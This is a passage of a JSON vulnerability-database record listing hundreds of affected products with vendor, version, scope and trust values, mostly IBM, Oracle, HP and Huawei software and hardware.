"vendor": "ibm", "version": "7.1.3.10" }, { "model": "security network controller 1.0.3381m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "oceanstor s2600t v200r002c20spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.01" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "flashsystem 9843-ae2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "sparc enterprise m3000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.1.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "propel", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.01" }, { "model": "system storage ts3400 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0042" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.5" }, { "model": "infosphere optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.4.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.10.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.029" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "tivoli netcool/omnibus webgui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "jrockit r28.2.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "content collector for sap applications", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.2" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.20" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.11" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.5" }, { "model": "sparc enterprise m9000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "oceanstor s2600t v200r002c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s2600t v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.01" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2.6" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.41" }, { "model": "rse ru r3303p18", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.3" }, { "model": "storwize unified", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.7" }, { "model": "sonas", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.2" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "30-165)0" }, { "model": "rational directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.31" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.023" }, { "model": "tivoli netcool/omnibus webgui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "jre update6", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.41" }, { "model": "db2\u00ae connect? unlimited edition for system z\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "lotus widget factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "data server driver package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.470" }, { "model": "java sdk sr16-fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "system storage ts2900 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0034" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "abyp-4tl-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "data server client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.13" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.022" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.7" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "system storage ts3400 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0040" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.5" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "jrockit r27.7.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "spectrum scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "performance manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.00" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.09" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.8.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.51.14.0" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "smartcloud orchestrator fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.22" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.46" }, { "model": "s7700 v200r005c00spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.01" }, { "model": "java sdk 6r1 sr8-fp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "enterprise common collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "jdk update5", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "cognos", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2.1.1" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7200" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "rational agent controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "abyp-4t-0s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "northstar controller application service pack", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "2.1.01" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "s9700 v200r007c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "p6000 command view software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.3.6" }, { "model": "sterling connect:direct browser ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.213" }, { "model": "jrockit r28.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "rational lifecycle integration adapter for hp alm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "websphere message broker toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "os image for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.0" }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.10" }, { "model": "flashsystem 9848-ac0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.13" }, { "model": "infosphere optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "xiv storage system gen2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "28100" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.51" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "flex system chassis management module 2pet12e", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.3" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jrockit r28.2.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli netcool impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571910" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.12.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "connect-it", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.53" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.32" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8.2" }, { "model": "oceanstor v100r001c20", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "flex system chassis management module 2pet12o", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.32" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "infosphere discovery", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "db2\u00ae connect? enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.3.0" }, { "model": "service manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.40" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3.3" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "powervc express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.10" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "flex system chassis management module 2pet10h", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.710" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.11.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571450" }, { "model": "java sdk sr11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "power ps701", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "java sdk sr15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "cognos command center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.23" }, { "model": "tivoli monitoring fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.302" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "mashup center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.05" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.7" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.5" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.5" }, { "model": "power ps704", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7891-74x)0" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "jre update1", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.12" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.20" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.60" }, { "model": "java se embedded 7u51", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "s12700 v200r007sph003", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sterling connect:enterprise for unix build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.4.0198" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.031" }, { "model": "tivoli continuous data protection for files", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "business process monitor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.23" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.5" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "security directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.31" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "notes and domino fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.13" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.030" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "sparc enterprise m5000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.1" }, { "model": "db2\u00ae express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "5500si (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.060" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "security network controller 1.0.3361m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.4" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.11" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.78" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.019" }, { "model": "spectrum scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.4" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55005)0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jre 1.6.0 37", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.50" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4.2" }, { "model": "s7700 v200r006c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "tivoli monitoring for tivoli storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "rational software architect for websphere software", 